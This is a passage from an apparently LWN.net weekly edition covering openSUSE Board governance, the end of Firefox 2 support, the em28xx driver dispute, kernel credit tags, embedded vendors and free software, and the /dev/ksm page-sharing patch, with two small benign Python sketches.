Pascal: But this doesn't mean it's one-way. The non-Novell
contributors in the community also do a lot, most of them during their free
time, as in almost any FOSS project. The community is very important to
Novell, and I believe that the relationship should be seen as being equal
partners.


Michael: Could Novell do more? Of course as everybody could do more.
But would it make sense? I doubt it. Rather than having even more support
by Novell I'd love to see more sponsors stepping up to base the openSUSE
project on broader shoulders and lose the dependency on one sponsor.


LWN: Does Novell exert too much control over the project?  Where are
the areas where Novell could allow more community control?


Bryen: The only time I've ever really seen any resistance from
Novell is when they are unable to provide adequate manpower and support for
a particular feature or request. But beyond that, there seems to be great
transparency by the teams within openSUSE. If we were to go down the
path towards greater community control, it is more about whether there
is adequate manpower within the community to provide the support it
needs. I don't think Novell is resistant to that at this time, but
ultimately, it is about increasing membership where we can all work
together seamlessly.


Pascal: I don't believe that Novell exerts too much control over the
project. It's rather the opposite. It is important to understand that this
is an evolving process, where we started from (more or less) everything
closed except for a few when S.u.S.E. GmbH was acquired by Novell to the
point where Novell pushed for opening up many things around openSUSE when
it launched opensuse.org three years ago.  More and more domains and teams
have opened up towards the community, and the community has grown with it.
Right now, we're rather in a position where Novell is actually looking for
more contributors from the community, with existing open processes (open
discussions on our mailing-lists, source code available in public
Subversion repositories, etc...).

There are still a few areas where we're still at the beginning of
opening up (actually rather at the point of starting to think about ways
to do that properly), such as having non-Novell employees co-maintain
core distribution packages or the openSUSE reference guide.
As said, it's in flux, and certain things take time, but Novell
definitely hasn't been standing in the way, quite the contrary.
And while Novell ultimately has the most resources in certain or even
most areas of the project, especially in building the distribution and
providing security maintenance during the openSUSE release lifetime,
there is always room for discussion.

One notable example was the thread about whether KDE 3 should be removed
from openSUSE 11.1, as KDE 4 is where almost all KDE developers put
their efforts in. At first, Novell's product management position was to
drop KDE 3 because it would mean supporting it for 2 years. But the
discussion led to a compromise, as many believe that KDE 4 wasn't quite
ready enough. In the end, openSUSE 11.1 will still have KDE 3, but KDE 3
will be dropped in 11.2. The KDE3 maintenance during the lifetime of
openSUSE 11.1 will be taken care of by Novell employees.  So, again, while
Novell commits most of the resources, the opinion of the community is
important to them, for obvious reasons.


Michael: With regards to more community control I think we (the
project) need to define clearer rules how to contribute and I'd love to
see co-maintainership for more and more packages, long term even core
packages.


LWN: Is the current board, with 5 members (2 Novell + 3 non), a good
size and does it achieve the right balance of corporate vs. community?


Pascal: I believe that 5 individuals form a good team size to
effectively get things done. The background of each member also happens
to strike an interesting, diverse and good balance of opinions and
influences both from within Novell employees as well as from the
non-Novell employees in the community. This is clearly very healthy and
can only lead to better representation of the community's opinions.

I can also imagine that at some point, that differentiation between Novell
employee and non-Novell employee Board position shall be removed. Remember
that it is our first elected Board. We take some decision and define some
processes because we believe that they offer a good balance. Actually, the
idea behind that separation was to make sure that there were two seats
occupied by non-Novell employees (and not less).


Bryen: What is important is that we ensure adequate representation
of the community and that the community is heard.  As the Community grows,
we might have to revisit the size of the Board and consider adding adequate
representation.


Henne: I also have the feeling that on the topic of Novell and
openSUSE there is a big misconception. There really is no versus in that
relationship. In fact the openSUSE community consists of people that support
the openSUSE project and its goals. Some of those people are employed by
Novell, some of them are not. So it's not "corporate vs. community" but
rather "community equals corporate and non-corporate".  Also, the openSUSE
Board isn't the dictator of this project. The project consists of many many
different areas where people lead and make decisions on a daily basis. Some
of those people are employed by Novell, some of them are not. So to execute
control over this Board does not give you control over the openSUSE
project. Just over the openSUSE Board.

We understand that this is a controversial topic. But you shouldn't get
too theoretical while reflecting upon it. It is very tempting but this
is a total non-issue in reality. We are not trying to find the best
theoretical possibility to govern a project. We are hackers that try to
get things done.


LWN: In the openSUSE election members were able to name another
contributor (non-member) to be a voter. Would you like to see this continue
in future elections?  Do you know if there were many non-members who voted
in this election?


Henne: I think we all agree with our election officials that this was
a special rule for the first election (see Board Election page).  So this
will not continue for future elections. There were 25 non-members
eligible. How many of them voted is not public.


Bryen: The non-member voters really represented a small fraction of
the electors as a whole. 25 out of 237. There were certainly mixed feelings
across the board about the idea of franchising votes, but the idea was
noble by the election committee to find ways to further identify potential
members and increase membership. Since one of the Board's mandates is to
grow the Community, I don't see the need for franchising votes in upcoming
elections. By the time the next election comes along, we should have done
significant work in reaching out to more new potential members.


LWN: How do regular users get more involved?  How can they
contribute to both the technical work and the decision making?


Henne: As with any other open source project: Be there or be square!
Seriously, it's as simple as showing up and participating. That's one of the
beauties of free and open source projects.  To contribute to our user
support just subscribe to one of our mailing lists, join one of our IRC
channels or login to our forum and help people as best as you can; as
described here.

To contribute to our documentation go and help organizing and authoring in
our Wiki.  To help to translate the
openSUSE distribution into your language join one of our various translation teams and translate
strings to your native language.

To contribute to the distribution use the openSUSE Build service.  And those
are just the four main entrances into our project. You can have it as
specialized as helping openSUSE HAM users to transmit via radio, spinning
your own version of openSUSE for educational use or create artwork to be
included in the distribution.  The same holds true for decision making.
All of the different areas make their own decisions. So to influence
decisions you go there, participate and voice your opinion.

Decisions that concern the overall project are always discussed at the
opensuse-project mailing list or are a topic in the bi-weekly
opensuse-project meeting. So you just go there and do the same.
It is really as simple as that.


Bryen: I think my personal story is the best example of all. Of all
the members on the Board, I'm probably the least technical. I'm more of an
active user than anything else.  How did I get involved? I attended
meetings on IRC, advocated a11y, got involved in education by forming the
openSUSE Helping Hands project and as co-editor of the
openSUSE-Tutorials.com web
site.

Users can become members through advocacy, promoting openSUSE regularly
at local events, getting online and providing support to new users in
IRC and the forums. It's really not that difficult to become a member
and you don't have to be a technical genius to become a member.


Pascal: I'd like to add that while a number of things are in place,
we clearly have to work even further on lowering the barriers for people
who are willing to contribute. Even better tools, better documentation,
even more translations. As always, and as for any other FOSS project, there
is always room for improvement.


Michael: I can just support Pascal's opinion that it would be
beneficial for us to lower barriers and provide a clearer description in
what and how everybody can contribute and present our existing tools
better.  Especially implement some cross-functionality like better
integration of our Bugzilla and the openSUSE build service for instance.


LWN: Do you see areas of collaboration with other distributions
either currently or in the future?


Henne: Collaboration is our foundation. We would cease to exist if
we wouldn't collaborate with everyone else in the free and open source
community.  Among them are, of course, also other distributions.  Whether
openSUSE project members hack with members of the Debian or Slackware
projects on some upstream project like the Linux kernel, or that we
coordinate when it comes to security issues with everyone else on
vendor-sec, or that we try to consolidate tools we use like we do with
Fedora on smolts.org.  There are of course also the big collaboration
projects we support like the Linux Standard Base or freedesktop.org.  So we
are collaborating heavily with other distributions already and we will
continue to do so in the future.


Bryen: Generally speaking, collaboration is an integrated feature of
open source, so yes, collaboration exists across the board between openSUSE
and other distributions.


Pascal: I'd like to see that going even further. As one of the
organizers of the FOSDEM conference, one of our primary goals there is
to foster cross-pollination between projects with similar goals and
domains. While difference and choice are some of the key features of
FOSS (yes, I believe that having many distributions is very healthy),
there are situations where working together on a few things makes sense.
There isn't always a point in reinventing the wheel. Sharing development
efforts and commoditizing tools for contributors is clearly something
I'd like to see happening more often.

While openSUSE is definitely a brilliant distribution in many regards
and while we have a healthy community that consists of great people, we
still have a lot to do, and so do the other distribution projects.
They're not less good nor less deserving, we all have our strengths and
weaknesses, so we should work together to make Linux and FOSS a better
experience to everyone. If you're feeling at home with another
distribution, great, contribute there! And if you think you'd like to
contribute to our distribution or to our community, you are definitely
welcome here too. And if you believe there are domains where we can work
together, please get in touch with us at board -AT- opensuse.org.


Editor's note: We would like to thank the openSUSE Board for taking the
time to answer our questions.  Readers may notice that not all board
members have answered every question.  This was their choice and not due to
any censorship on our part.

		The end of the road for Firefox 2


By some accounts,
the Firefox browser is now responsible for a full 20% of web traffic.  As the
number of Firefox users grows, so does the need for top-quality support;
20% makes for a large number of potential attack points.  So it is
interesting to note that Mozilla is now planning to end Firefox 2 support in the
near future, perhaps before the end of the year.  This change could leave a
lot of users - and not just Firefox users - in a difficult position.

One obvious question to ask would be: have most Firefox users moved on to
Firefox 3?  Apparently, about two out of three users have made the
change, but millions of users have yet to move away from the older
browser.  The Mozilla project would like to get as many of those users to
switch before ending support; that, in turn, requires looking at why they
haven't yet upgraded.  There seem to be a few prominent reasons beyond
sheer inertia:


 Some users have systems which are not supported by Firefox 3.
     Many of these, it seems, are running old versions of Windows - 9x or
     NT4.  In these cases, the operating system itself has long since
     ceased to receive support, so it's not entirely clear that continuing
     to support the browser does a whole lot of good.

 Others are dependent on extensions which have not been ported to
     Firefox 3.  While most actively-developed extensions 
     were ported some time ago, it appears that there are quite a few extensions
     which, while still having significant numbers of users, have been
     abandoned by their developers.  Zack Weinberg has suggested that the project could make an
     active effort to find new maintainers for those extensions, or even
     fix a few of them itself.

 The Firefox 3 experience is not problem-free for all users; there have
     been some complaints about printing on some systems, for example.
     Finding - and fixing - the remaining blockers is clearly an important
     thing for the Firefox developers to do.


Somehow, ways will probably be found to coax most of these users into
moving forward to a newer browser.  Beyond doubt, though, some will be left
behind, and some of those may learn the hard way what "unsupported" really means.
But that will be true no matter how long Firefox 2 is supported;
there's never a way to get all users to upgrade.  Firefox is not different
from any other application in this regard, with the sole exception that its
user base is larger than most.

There is another important aspect to this story, though: this decision will
affect users well beyond those who use Firefox.  The end of Firefox 2
support will also bring an end to support for the Gecko 1.8.1
platform.  And this version of Gecko is used by several applications beyond
Firefox, including Camino, SeaMonkey, Sunbird, Miro, Instantbird, and Thunderbird.
All of these applications currently use Gecko 1.8.1 - the soon-to-be-discontinued
version - for HTML rendering.

There is a fair amount of concern about Thunderbird in particular.  This mail client was
recently kicked out of the Mozilla nest to fend for itself.  Thunderbird
developers are working toward a Thunderbird 3 release (the third
alpha release came out in mid-October) which will use a newer version
of Gecko.  But the 3.0 release is still several months away - some months
after the end of Gecko 1.8.1 support.  Naturally enough, the Thunderbird
developers worry that their current users will be running in an unsupported
mode; that does not strike them as the best start for their
newly-independent project.

The word from the Mozilla Foundation seems to be that the Gecko platform
will continue to be supported, in some minimal fashion, for a while yet.
According to Samuel Sidler:


	The triage and release team that currently works on Firefox and
	Thunderbird 2.0.0.x releases will continue to triage requests for
	Thunderbird 2.0.0.x and maintain its releases until six months
	after the release of Thunderbird 3.

	Note that this will mean that browser-specific security and
	stability bugs will likely be ignored/minused. We'll only be
	considering bugs that affect Thunderbird 2.0.0.x.


So it seems that Thunderbird should be covered - as long as the people who
decide whether bugs are "browser-specific" do their job properly.  But
experience has shown many times that it can be hard to understand the full
implications of a given bug.  It would not be all that surprising for one
or more "browser-specific" bugs to turn out to be fully exploitable in
Thunderbird.

Beyond that, though, applications like SeaMonkey and Camino are
browsers.  Developers from those projects are, needless to say, concerned
that their needs are not being taken into account.  They are not attracted
by the idea of shipping a browser based on a platform where
browser-specific bugs are being ignored.  Mozilla developers have tried to
reassure these groups that the situation is not as bad as it seems, but how
things will work for them is far from clear.  The real answer was, perhaps,
suggested by Samuel:


	The community can take over this branch, just as has been done for
	Gecko 1.8.0 (currently managed by Linux vendors)


In other words, Mozilla would like to outsource the maintenance of this
code to the community, and to distributors in particular.  The good news is
that this is free software, so this kind of extended maintenance is
possible as long as the interest is there to do it.  Gecko is a non-trivial
body of software to maintain, but it should be possible for the various
interested projects, along with distributors still shipping this code,
to pool their effort and get the job done.  In their spare time, perhaps,
they can give some thought to how they might avoid getting caught in the
same situation when Firefox 3 reaches the end of its supported life.

		The sad story of the em28xx driver


Over the last year or two, the kernel development process has been changed
in a deliberate attempt to make the addition of new drivers easier.  It has
become clear that out-of-tree drivers often do not get any better until
they are merged; meanwhile, users want those drivers and distributors are
shipping them.  So it would seem that everybody's interests are served by
getting those drivers into the mainline tree.  Experience with drivers
merged under this policy has generally been positive; once those drivers
head for the mainline, they get more attention and tend to improve
quickly.


Given that, one might well wonder why Markus Rechberger's recently
submitted "empia" driver series is encountering so much resistance.  This
driver works with a number of video acquisition devices based on Empia
chips; many of those are not supported by the kernel now.  As an Empia
Technology employee, Markus has access to the relevant data sheets and is,
thus, well placed to write a fully-functional driver.  There are users who
will attest that the drivers work, and that Markus provides good support
for them.  But, as things stand now, it would appear that this driver is
not headed for the mainline.


What we have here is a classic story of an impedance mismatch between a
developer and the development community.  In the process, this long story
has helped to give the Video4Linux development community a bit of a
reputation as a dysfunctional family - a perception which
those developers are only now beginning to overcome.  The sad truth would seem
to be that, while working with the community is something that a couple
thousand developers do with little trouble every year, there will always be
a few who have difficulties.

A quick review of some of the history is in order here.
Markus was one of the authors of the original em28xx driver, first merged
for the 2.6.15 kernel.  His efforts to enhance that driver quickly ran into
trouble, though, when he tried to make substantial changes to the low-level
tuner interface - changes which affected a number of other drivers.  These
changes were not popular in the Video4Linux community, and there were fears
that they could break unrelated drivers.  So this code was not merged.

In response to this rejection, Markus claimed
ownership of the em28xx driver and asked that it be removed from the
mainline kernel.  He then continued development of the code, hosting it on
his own server.
There was even a period where the code was relicensed to the MPL, apparently as
part of an attempt to prevent it from being
taken into the mainline.  


Eventually, Markus came back with a new approach which moved much
of the tuner code into user space.  That solution, too, failed to pass
review; nobody else could really see much advantage in moving that much
driver code out of the kernel.  The fact that Markus clearly intended to
have some of that code appear in the form of binary-only blobs did not help
his case.  So the user-space approach, like its predecessor, was not
merged.


While Markus was working on his own version of the code, others were
putting patches into the mainline em28xx driver.  At times, Markus tried to
block those changes.  The tone of the discussion is, perhaps, best seen
from this note sent to Video4Linux
maintainer Mauro Carvalho Chehab:


	Best would be to replace you as a maintainer since you don't have
	any respect of others work either.  Companies should be aware that
	if they try to submit any code to you they will loose the authority
	over _their_ work.


Of course, losing "authority" over code is inherent in releasing that code
under a license like the GPL.  This attempt to exercise control over
freely-licensed code was slapped down by
Andrew Morton and others, but it left unpleasant memories behind.

Now Markus is back with a driver that, to all appearances, duplicates the
functionality of a driver which is already in the mainline kernel.  It is
not hard to see this submission as an attempt to retake control of that
driver and, perhaps, restart the discussions from past years.  So it is not
entirely surprising that this driver has not been received with a great
deal of enthusiasm.  In short, Markus has been told to go away until he is
prepared to submit his work in the form of a series of small patches to the
in-tree em28xx driver.


The advantages of improving the current driver, rather than duplicating
some of its functionality 
in a new code base, are clear.  It would avoid the confusion which can
come from having two drivers for the same hardware in the tree, and it
would minimize the risk of losing important fixes which have been applied
to the in-tree code.  This is, also, the way that kernel developers are
normally expected to do their work.
On the other hand, video developer Hans Verkuil reviewed the new driver and concluded:


	In my opinion it's pretty much hopeless trying to convert the
	current em28xx driver into what you have. It's a huge amount of
	work that no one wants to do and (in this case) with very little
	benefit.


This review notwithstanding, Mauro has indicated that he is not interested in
accepting this patch.  
But rejecting Markus's new driver out of hand might just be a mistake.  There
seems to be little doubt that it has developed well beyond the in-tree
driver; it supports a wider range of devices.  Failure to merge it risks
losing the work that has been done, and, perhaps, losing the future work of
a developer who, for all his faults, is clearly trying to provide a better
experience for Video4Linux users.

Having multiple drivers for the same hardware in the kernel is not an ideal
situation, but it is also not without precedent.
The IDE and parallel ATA subsystems provide
redundant support for a wide range of hardware.  The e1000 and e1000e
drivers had overlapping coverage for some time.  In such cases, the
long-term goal is usually to work toward the removal of one of the
drivers.

So one could make the case for merging the new driver and, eventually,
removing the older one.  In the process, the new driver could receive some
much-needed attention from other developers.  It has coding style and
copyright attribution problems; a quick review has also left your editor
wondering about locking issues.  But such problems are common to drivers
which have spent a lot of time out of tree; they are simply something to
fix.  Meanwhile, this driver contains the result of years of work and
access to the relevant data sheets; freezing it out may not be in the best
interests of kernel developers or users.

		Tracking of testers and bug reporters - a status report


A recurring topic at kernel summits is proper recognition for users who
report bugs and test fixes.  These people help the development process
considerably, but they are far less visible than the developers who are
creating those bugs in the first place.  Since we would like to have more
testers and reporters, it makes sense to reward them in whatever way we
can.  One of the strongest currencies we hold is credit for work done.  So
it stands to reason that crediting those who help the development process
is in the interest of everybody involved.

One mechanism developed for this purpose is a set of tags applied to
patches before they are merged into the mainline.  When a patch fixes a
bug, the user(s) who reported that bug should be credited through the
addition of a Reported-by: tag.  Similarly, testers are credited
with the Tested-by: tag.  As it happens, some developers have
adopted the habit of using Reported-and-tested-by: as a way of
saving valuable newlines in the common case where a user fills both roles.
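The tag convention described above is simple enough to count mechanically.
What follows is a minimal sketch in Python, not your editor's actual git
data mining utility: it assumes the changelog text has already been
extracted from the repository (with "git log", for example), and the
function name count_credits() is purely illustrative.  The combined
Reported-and-tested-by: form is counted once in each role.

```python
import re
from collections import Counter

# Tags named in the text; the combined form credits both roles at once.
TAG_RE = re.compile(
    r"^[ \t]*(Reported-by|Tested-by|Reported-and-tested-by):[ \t]*(.+?)[ \t]*$",
    re.IGNORECASE | re.MULTILINE,
)


def count_credits(changelogs):
    """Return (reporters, testers) Counters keyed by the credited name.

    `changelogs` is an iterable of changelog strings, one per changeset.
    How those strings are obtained is outside the scope of this sketch.
    """
    reporters, testers = Counter(), Counter()
    for text in changelogs:
        for tag, who in TAG_RE.findall(text):
            tag = tag.lower()
            if "reported" in tag:
                reporters[who] += 1
            if "tested" in tag:
                testers[who] += 1
    return reporters, testers
```

Calling most_common() on either Counter yields a ranked list of the people
credited.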

There is a certain warm feeling that comes with having one's name stored in
a changelog entry in the kernel source repository.  But the amount of
visibility which comes from this event is relatively small.  So your editor
decided to hack up his git data mining utility to track these tags.
Without further ado, here are the top problem reporters and patch testers
for the 2.6.27 development cycle:


All told, there were a total of 205 Reported-by: and 153
Tested-by: credits entered during the 2.6.27 kernel cycle.  This
is arguably a reasonable start for a new tag, but it seems clear that a lot
of problem reporters are not, yet, being credited in this manner.  Your
editor became curious to see just who is taking the time to credit these
people; they, too, deserve some credit.  A bit more script hacking yielded
these tables: 


The end result: Adrian Bunk gave over 20% of the total bug reporting
credits - to himself.  Beyond that, a number of the core developers are
taking at least some time to credit those who report bugs and test
patches.  But, in the end, the 10,628 changesets merged for 2.6.27 probably
contained quite a few more patches which could have carried such tags.  If
the reporting and testing tags are to become truly useful and significant,
they will have to be more universally used.

While your editor was at it, he also collected statistics for
Reviewed-by: tags.  These tags differ in that they are offered by
the reviewer, who thereby states that a reasonably thorough review has been
done and the code has not been found seriously wanting.  Code review is
perennially in short supply in just about any free software project, so,
again, proper credit for reviewers seems like more than just a good idea.
Here are the top credited reviewers for 2.6.27:


If these numbers are to be believed, only 123 reviews were performed over
the 2.6.27 development cycle.  Even the most cynical observer is likely to
agree that a bit more reviewing than that is going on.  Most reviewers do
not offer the associated tag, so their contribution goes unrecorded.  In
particular, Andrew Morton, who seems to review almost every patch which
appears, should be at the top of the above list.

Clearly, the task of ensuring proper credit for testers, bug reporters, and
reviewers is still in its initial stages.  But one has to start somewhere;
this is more information than we had before.  Hopefully, over time, the
habit of crediting those who help with the development process will become
more widespread.  And that, with luck, will encourage more testing and bug
reporting and, as a result, a better kernel.

		NLUUG/ELCE: Embedded devices and free software


On successive days, Harald Welte and David Woodhouse gave different views
of the relationship between embedded companies and the free software
communities whose code the companies are increasingly using.  Their
outlooks were not contradictory, but instead complementary; each came
at the topic from a different direction.  Welte looked mostly at what
companies, particularly chip vendors, could do better, while Woodhouse
looked at what the community could do to improve.


Welte and Woodhouse spoke at the
co-located NLUUG 
autumn Mobility conference and Embedded Linux
Conference Europe in Ede, the Netherlands, 
November 6 and 7.  The Congrescentrum De
Reehorst facility was excellent and well-suited to an event of this type,
which is not surprising as NLUUG has been holding two events there each year
for the last ten years or so.  In addition, the conference was
well organized and well run, clearly displaying the experience that comes from
the 26 years that NLUUG has been in existence.


[ The following covers Welte's presentation; Woodhouse's talk will be
covered in a subsequent article. ]


Welte kicked things off on Thursday with a talk entitled "How chipmakers
should (not) support free software".  As the conference got a bit of a late
start and was already 15
minutes behind at that point, Welte said that he would make the time up
because "everyone can understand gzip compressed speech".  More
seriously, he outlined the experience he brings to the topic: as a member of
the Linux community, as an embedded developer, as a chip manufacturer through
his recent work with Via, and as a customer of consumer-grade embedded
devices for gpl-violations.org.  Together, those roles give him multiple
relevant points of view.


Linux is being found in more and more devices today, some of them less
than obvious.  Welte listed fairly well-known examples like mobile
phones and in-flight entertainment systems, but then noted that
DSL Access Multiplexers (DSLAMs), payphones, ATMs, and vending and exercise
machines also run Linux.


Vendors of those devices are using free and open source software (FOSS)
because of its 
strengths, which he outlined.  There is a great deal of innovative and
creative development done in FOSS because the barriers to entry are fairly
low: the codebase is easy to
read—at least in comparison to closed source—and there are
standard development tools that are freely available.  Because development
is done in the open, developers will be embarrassed if their software
architecture or code is bad.  This also results in better security because of
the code review that takes place.


The outcome of using FOSS this way is that "we should have a perfect
world" 
with tons of embedded products, all secure and maintainable, that allow for
additional or alternate functionality via third parties.  The first of
those, many embedded products, has been achieved, but we are still waiting
for the other two, Welte said.


He contrasted a user's experience with Linux on PCs today with the
experience provided by most embedded devices.  For PCs, you can
download the kernel, build it and it will run, with most hardware
supported.  You can choose from multiple distributions, any of which will
have a kernel close 
to that of a mainline kernel and provide regular security updates.  These are
"things we are used to for many years", but things are not
that way in the embedded space.


In the embedded world, every CPU or system-on-a-chip (SoC) has its
own kernel tree, typically based on some ancient version of the kernel,
that never gets cleaned up or submitted for mainline inclusion.  So, they
get no benefit from new features or security fixes in the kernel.  There
are no distributions to choose from, either for users or board
makers and, even if updates are generated, there is generally no packaging
system to use to 
update the code; re-flashing the entire device is required.


In Welte's words, "this sucks!"  The embedded vendors get
unstable and unmaintainable software with "security
nightmares" and no 
innovation from elsewhere.  The vendors have kernels that have diverged so
far from the mainline that new features or fixes can't be backported, nor
can their kernels get merged upstream.  This is because the vendors tend to
be very short-sighted, only focusing on getting one particular device out
the door.   


From Welte's perspective, embedded vendors do not understand the real
potential of FOSS.  They do not 
think in terms of creating platforms that others can build atop.  In
general, "they would rather sell a new [device] rather than improve
the existing one".  So, the vendors compete on the basis of the
features their proprietary
competitors implement rather than figuring out how to take advantage of the
true strengths of FOSS.  If, instead, they used FOSS to its fullest, they could
outcompete the proprietary 
vendors in ways that could not be matched—except by using FOSS.


Turning to the chip vendors, Welte points out that there are two types of
customers: Linux-aware and Linux-unaware.  The Linux-aware
customers—whose numbers are growing—will
seek out vendors whose Linux support is better.  It is already relatively 
late in the game: "if you don't have proper FOSS support, you will
lose the 'openness competition'".


Chip manufacturers should be engaging in "sustainable
development" by releasing kernels developed against the mainline in
cooperation with the community.  One large mistake these vendors make is to
think their customers are only the tier-one companies that buy chips
directly.  There are many more downstream users of a chip once it has been
integrated into other hardware; the buyers of those devices are also
important as they will determine the success or failure of the product.


Unsurprisingly, Welte recommends that the development be done in the open,
with a public development tree.  Releases should not just be stable
snapshots or big code drops; "post early, post often" should
be the governing principle.  FOSS is not just a technology, as chip vendors
tend to think, it is a research and development philosophy that needs to be
integrated into both the internal and external processes of the chip vendor.


On the external side, making documentation available, without a
non-disclosure agreement (NDA)—or at worst a FOSS-friendly
NDA—is essential.  Internally, there is normally quite a bit of
learning required to understand the FOSS philosophy.  This will require
training for engineers as well as product management folks.
Having a clear FOSS support strategy, with clear goals, is important
for making it work.


Product management needs to understand that supporting Linux is mostly a
process of understanding the development model.  The Linux APIs are not a
particularly big hurdle, but understanding the community and how to work
within it can be.  Supporting Linux should mean supporting the mainline,
not just N distributions, as N will grow over time, which leads to more
problems. It is important to recognize that
Linux-aware customers care as much about the quality of the code as they do
about price and performance.


Engineering management needs to encourage engineers to communicate with the
community, which requires real internet access.  When faced with adding
functionality to some FOSS code, they should be looking at ways to
cooperate with others who have similar needs, rather than reinventing the
wheel. Engineers need to figure out how and where
to ask the right kinds of questions.  They also need to learn that code is
written to be read, not just executed; "this is something new to many
people". 


The community also has responsibilities to help the chip makers by
providing "non-partisan" documentation because these manufacturers often
have "no 
clue where to start or who to talk to" when they start considering
supporting Linux.  Commercial embedded distributors have a different
perspective from the community so documentation from the community
viewpoint is required.  Welte says that various Linux Foundation sponsored
efforts are helping in this area, but more needs to be done.
A mentoring program of some sort might
help by having FOSS developers willing to work with engineers to walk them
through the process of getting their code upstream.
The community must also work to keep from scaring chip vendor
engineers away by being overly rude or terse;  it is important that
valid criticism be fully explained. 


Welte sees a number of current or looming problems for chip vendors in
supporting 
Linux, mostly involving patents or technology licensing issues.  Various
licensing regimes (like those for MPEG or Sony's memory stick) impose
requirements that essentially preclude the development of free software
drivers to talk to devices that implement those technologies.  Everyone in
the industry has these problems, though, so Welte suggests that they band
together to present a case to the license holders; with enough smaller
players working together, their voice can be heard.


On the whole, Welte is somewhat pessimistic about where embedded devices
are headed.  He certainly sees more FOSS being used in devices in the
future, but expects to see them still be restricted so that they cannot
leverage the full potential of FOSS.  He does see "some very dim
light at the end of a very far tunnel" in projects like Openmoko,
and in efforts by some chip vendors, notably Intel, to fully support Linux.


It was not that many years ago that the desktop Linux situation looked as
bleak as the embedded space does today, so there is hope.  Presentations
like Welte's can only help to bring that about.  The audience contained
many embedded developers; hopefully they can help their companies'
management see the benefits that Welte outlines so that his perfect world
comes about sooner.  If the desktop is any guide, though, it will come about
eventually.


		/dev/ksm: dynamic memory sharing


The kernel generally goes out of its way to share identical memory pages between
processes.  Program text is always shared, for example.  But writable pages
will also be shared between processes when the kernel knows that the
contents of the memory are the same for all processes involved.  When a
process calls fork(), all writable pages are turned into
copy-on-write (COW) pages and shared between the parent and child.  As long
as neither process modifies the contents of any given page, that sharing
can continue, with a corresponding reduction in memory use.

Copy-on-write with fork() works because the kernel knows that each
process expects to find the same contents in those pages.  When the kernel
lacks that knowledge, though, it will generally be unable to arrange
sharing of identical pages.  One might not think that this would ordinarily
be a problem, but the KVM developers have come up with a couple of
situations where this kind of sharing opportunity might come about.  Your
editor cannot resist this case proposed by
Avi Kivity:


	Consider the typical multiuser gnome minicomputer with all 150
	users reading lwn.net at the same time instead of working.  You
	could share the firefox rendered page cache, reducing memory
	utilization drastically.


Beyond such typical systems, though, consider the case of a host running a
number of virtualized guests.  Those guests will not share a process-tree
relationship which makes the sharing of pages between them easy, but they
may well be using a substantial portion of their memory to hold identical
contents.  If that host could find a way to force the sharing of pages with
identical contents, it should be able to make much better use of its memory
and, as a result, run more guests.
This is the kind of thing which gets the attention of virtualization
developers.  So the hackers at Qumranet/Red Hat (Izik
Eidus, Andrea Arcangeli, and Chris Wright in particular) have put
together a mechanism to make that kind of sharing happen.  The resulting
code, called KSM, was recently posted for wider review.

KSM takes the form of a device driver for a single, virtual device:
/dev/ksm.  A process which wants to take part in the page sharing
regime can open that device and register (with an ioctl() call) a
portion of its address space with the KSM driver.  Once the page sharing
mechanism is turned on (via another ioctl()), the kernel will
start looking for pages to share.

The algorithm is relatively simple.  The KSM driver, inside a kernel
thread, picks one of the memory regions registered with it and starts
scanning over it.  For each page which is resident in memory, KSM will
generate an SHA1 hash of the page's contents.  That hash will then be used
to look up other pages with the same hash value.  If a subsequent
memcmp() call shows that the contents of the pages are truly
identical, all processes with a reference to the scanned page will be
pointed (in COW mode) to the other one, and the redundant page will be
returned to the system.  As long as nobody modifies the page, the sharing
can continue; once a write operation happens, the page will be copied and
the sharing will end.
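The scan-and-merge step described above can be sketched in user space.
This is an illustration in Python under stated assumptions, not the KSM
code itself: pages are stood in for by bytes objects, the function names
are invented for the example, and the copy-on-write remapping is reduced
to a dictionary recording which page each page would be pointed at.

```python
import hashlib

PAGE_SIZE = 4096  # assumed page size, for the example data only


def merge_identical_pages(pages):
    """Map each page index to the index of the page it would share.

    The SHA1 digest only nominates candidates; a full byte comparison
    (memcmp() in the kernel's case) confirms that the contents match.
    """
    by_hash = {}      # digest -> indices of distinct pages with that digest
    shared_with = {}  # page index -> index of the page it is pointed at
    for idx, data in enumerate(pages):
        digest = hashlib.sha1(data).digest()
        candidates = by_hash.setdefault(digest, [])
        for other in candidates:
            if pages[other] == data:
                shared_with[idx] = other  # redundant page can be freed
                break
        else:
            candidates.append(idx)
            shared_with[idx] = idx        # first page seen with this content
    return shared_with


def pages_saved(shared_with):
    """Number of pages that could be returned to the system."""
    return len(shared_with) - len(set(shared_with.values()))
```

A write to a shared page would break the sharing again; that part is left
out of the sketch, since it depends on the kernel's COW machinery.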

The kernel thread will scan up to a maximum number of pages before going to
sleep for a while.  Both the number of pages to scan and the sleep period
are passed in as parameters to the ioctl() call which starts
scanning.  A user-space control process can also pause scanning via another
ioctl() call.
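The pacing of the scanner, a fixed number of pages followed by a sleep,
can be pictured with a small loop.  This is only a sketch in Python: the
parameter names pages_to_scan and sleep_seconds are invented for the
example and are not the names used by the actual ioctl() interface.

```python
import time


def scan_in_batches(pages, pages_to_scan, sleep_seconds, scan_page,
                    sleep=time.sleep):
    """Scan `pages` in batches, sleeping between batches.

    `scan_page` is called once per page; `sleep` is injectable so the
    pacing can be observed without actually waiting.  Returns the number
    of batches that were run.
    """
    batches = 0
    for start in range(0, len(pages), pages_to_scan):
        for page in pages[start:start + pages_to_scan]:
            scan_page(page)
        batches += 1
        # Sleep only if there is more work left to do.
        if start + pages_to_scan < len(pages):
            sleep(sleep_seconds)
    return batches
```

A larger batch or a shorter sleep finds duplicate pages sooner at the cost
of more CPU time, which is the tradeoff the two parameters expose.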

The initial response to the patch from
Andrew Morton was not entirely enthusiastic:


	The whole approach seems wrong to me.  The kernel lost track of
	these pages and then we run around post-facto trying to fix that up
	again.  Please explain (for the changelog) why the kernel cannot
	get this right via the usual sharing, refcounting and COWing
	approaches.


The answer from Avi Kivity was reasonably
clear:


	For kvm, the kernel never knew those pages were shared.  They are
	loaded from independent (possibly compressed and encrypted) disk
	images.  These images are different; but some pages happen to be
	the same because they came from the same installation media.


Izik Eidus adds that, with this patch, a
host running a bunch of Windows guests is able to overcommit its memory
300% without terribly ill effects.  This technique, it seems, is especially
effective with Windows guests: Windows apparently zeroes all freed memory,
so each guest's list of free pages can be coalesced down to a single,
shared page full of zeroes.

What has not been done (or, at least, not posted) is any sort of
benchmarking of the impact KSM has on a running system.  The scanning,
hashing, and comparing of pages will require some CPU time, and it is
likely to have noticeable cache effects as well.  If you are trying to run
dozens of Windows guests, cache effects may well be relatively low on your
list of problems.  But that cost may be sufficient to prevent the more
general use of KSM, even though systems which are not using virtualization
